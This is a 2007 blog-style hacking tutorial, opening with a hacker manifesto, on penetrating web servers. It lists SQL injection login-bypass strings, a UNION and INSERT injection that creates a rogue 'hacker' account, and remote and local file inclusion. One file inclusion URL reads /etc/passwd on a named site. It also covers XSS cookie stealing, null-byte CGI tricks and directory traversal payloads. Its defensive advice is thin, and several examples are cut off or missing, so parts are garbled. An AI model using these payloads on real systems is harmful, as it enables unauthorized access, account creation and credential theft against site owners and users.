Tuesday, June 12, 2007
THE MOST USED METHODS TO PENETRATE A WEBSERVER.
* This tutorial is destined to increase your knowledge in internet security, penetrating web-servers;
* This document was prepared for informational purposes only;
* This document can not be multiplied without the authors permission.
Respects to my friend, flow-flow, for the German paper on the same.
I am here to exploit, to learn how thinks work.I’ve always put questions and I have always seeked for more than two hours.My crime is one of coriousity, I exploit what you dream of I am over ambition and will. If you want to enter this world , break away ,forget all you have learned from the others ,the ignorants ,those without interest and learn to do exactly what you want with your knowledge.
I’m in the underground for 5 years ,from my first contact with the computer since 10 years ago ,I was fascinated from the first moment of the infinite possibilities that it opens for a man.
You don’t know me ,so don’t judge me ! ONLY GOD can judge me !
If you feel something reading these lines, that means that I am talking to you, if not look away.
We have to help each other, hacking can not be defind ,hacking is a state of mind.
I thank all of you that helped and help me !
This is my manifesto !
The tutorial will be structured in two directions : vulnerabilities and fixing them.
A lot of people are making tutorials but they just talk , i am going to really explain a few methods as we go. I don’t consider myself a specialist but i know what i am talking about.
Sql injection is the method that exploits the errors from the code applications and it allows the attacker to inject SQL commands in the login forms ,feedback forms with the purpose to obtain access to sensible information from the data base.SQL Injection has effect because the imput forms allow SQL expressions to penetrate directly in the data base.
Building programes with SQL to manipulate the commands from the data base and so getting access.The most used is SQL login bypass,through which we inject in the login and password fields.
Example ‘ OR 1=1—
URL scheme: http://site.com/index.php?id=0 ‘ OR 1=1—
Other comands : admin’—
‘ OR 0=0—
‘ HI OR 1=1—
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
We look for vulnerable sites with the following google-dorks :
How to defend yourself from such attacks.
The system must be checked for any sort of vulnerability ,the codes need to be bug free and the applications and all that means infrastructure must be satinized.
At each change of the components it must be done a web security audit.
It has no sense for me to get in any more detailes. If you don’t have a complex infrastructure that you have to take care of it isn’t forth for you to get more involved that you already are.
SQL Injection table modification
Here’s what we are going to do.
We are going to create an account with special rights.This method involves 3 steps : the generation of an error that must be understood ,it is important to see a certain table name ,after that we are going to inject commands to create an new privilegeate account.
At the username : ‘ HAVING 1=1
The error must contain a table name : user_member.id .
Then the injecting of the commands : ‘UNION SELECT * FROM user_member WHERE USER_ID=’ADMIN’ GROUP BY USER_ID HAVING 1=1;--
After the error is generated we try :
‘INSERT INTO USER_MEMBER(USER_NAME,LOGIN_ID,PASSWORD,CREATION_DATE)VALUES(‘HACKER’,’HACKED’,’HCKED’,GETDATE());--
Now if everything went well we shold be able to log in with :
-user : hacker
-password : hacked
REMOTE FILE INCLUSION
In this method what we actually what to do is upload a file ,a shell emulator on the web page, the vulnerable web page.When the web site calls another page to be displayed we will build a URL scheme, we will upload the emulator,getting access to the entire server.
This method is much more than this ,this is only a form of it so read further more and more tutorials.
Here is a couple of google-dorks to find vulnerable web sites :
: inurl :”index.php?page=”
We test on : http://site.com/director_vulnerabil.php?=http://google.com ,if the page opens in google in the site frame then it is vulnerable.
LOCAL FILE INCLUSION
A code problem can have serious consequencies ,this method is similarily to CGI Exploitation. Lets say i have access the password folder from the UNIX server. Simple ,anyone can do this kind of stuff ,after a scan of a site and POC ! then great hacker.This is lame stuff ! never use a scanner ,only if you have to ,or you are interested in a particular thing at the site.
At every vulnerability you have to understand the problem ,the code that generates it and so on.
Here is an example of an error :
$page input is not satinized.
The content is crypted ,but you can try with the bruteforce method using a program such as Brutus, will publish a perl code soon.I searched for passwords of FTP accounts for instance.It depends on your luck to.
URL scheme used : http://kleenrite.net/index.php?Tab=Renting&incFile=/etc/passwd
REMOTE ADMIN FILE DISCLOSURE
You try this more ‘blind’ in general because we don’t know for sure if it will work every time.
Remote Admin Password Disclosure,we try to acces folders from the inside.
URL scheme : http://www.site.com/files/uploaded/download.php?filename=download.php
I have posted alot of examples on other sites where I have found some serious info like passwords and so on. Here it isn’t such a big deal.
CROSS SITE SCRIPTING
It is in a state of research and it is the future some say ,well I am going to present how you can find this vulnerability and how you can exploited but as I said at RFI you have to study seriously if you want to really understand.
More exactly I’m going to refer to cookie stealing. For the test you proceed similarly as in SQL Injection.You look in forms and you try to inject simple scripts like : .The result is a alert window with the text “xss”, good now you know that you can try a more complex script.We will build a cookie stealer and I will show you how you can look for cookies directly from an URL scheme.
After we test it like so : script>alert(‘XSS’) we do the following:
NULL BYTE-CGI EXPLOITATION
CGI (or Common Gateway Interface) is a file that it is found on web servers and it gives control at cgi and pl files.The CGI scripts and folders are used for statistics ,forms and data base commands.NULL byte is used in programming and it says the end of a string.The CGI page acceses other pages like so :
Here page2.html is shown but if we modify a little like so :
We just added NULL byte and it comes to the end all the data in the URL. Now we do the following scheme :
Almost seems like LFI.
Directory Transversal is an HTTP exploit and it allows the attacker to access folders from the inside the server and to execute commands from the server’s root.
· Access Control Lists (ACLs)
· Root directory
These are two security protocols used on a server. In Access Control Lists the administrator puts limits on users and configures all the other functions. Root directory stops users to access files that contain sensibile data like CMD on the Windows platform and passwd folder on Linux/UNIX.
http://site.com/show.asp?view=../../../../../Windows/system.ini The URL scheme makes a request to the show.asp page from the server and sends the view parameter with the value
../ represents the director we go one folder up.
Another scheme would be : http:/site.com/scripts/..%5c../Windows/System32/
Hope this helps all of you, its an easy into to Web Application Security.
See u soon,